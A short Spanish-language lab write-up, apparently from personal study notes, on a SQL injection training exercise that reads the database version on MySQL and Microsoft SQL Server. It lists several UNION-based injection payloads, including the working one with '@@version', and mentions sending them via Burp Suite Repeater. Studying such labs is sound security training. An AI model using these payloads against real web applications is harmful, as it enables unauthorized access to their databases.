🪻Laboratorio: ataque SQLi, consulta del tipo y versión de la base de datos en MySQL y Microsoft

En este momento haremos un laboratorio muy similar al anterior pero en este caso será enfocado en una BD diferente, antes era Oracle ahora es MySQL y Microsfot SQL que aunque son dos diferentes las dos guardan la misma sintaxis para lo que se refiere a obtener la version de la base de datos, que es con el comando:

SELECT @@version

gifts'+UNION+SELECT+'abc','def'#

Con este comando de alguna forma intentaremos deducir que columnas tienen texto para poder introducir dentro de esa columna la “@@version” y la otra simplemente la dejamos como NULL.

Gifts'+UNION+SELECT+@@version,NULL#
Gifts'+UNION+SELECT+@@version,+NULL#
Gifts'+UNION+SELECT+@@version,NULL# #COMANDO CORRECTO.

¿Por qué razón no podia resolver el laboratorio desde la url simplemente? no lo sé pero haciendolo desde burpsuite con repeater lo pude solventar, en response vemos como aparece dentro de las etiquetas <th> </th> la version de la BD.

PreviousLaboratorio: ataque de inyección SQL, consulta del tipo y versión de la base de datos en Oracle NextLaboratorio: ataque de inyección SQL, enumerando el contenido de la base de datos en bases de datos

Last updated 1 year ago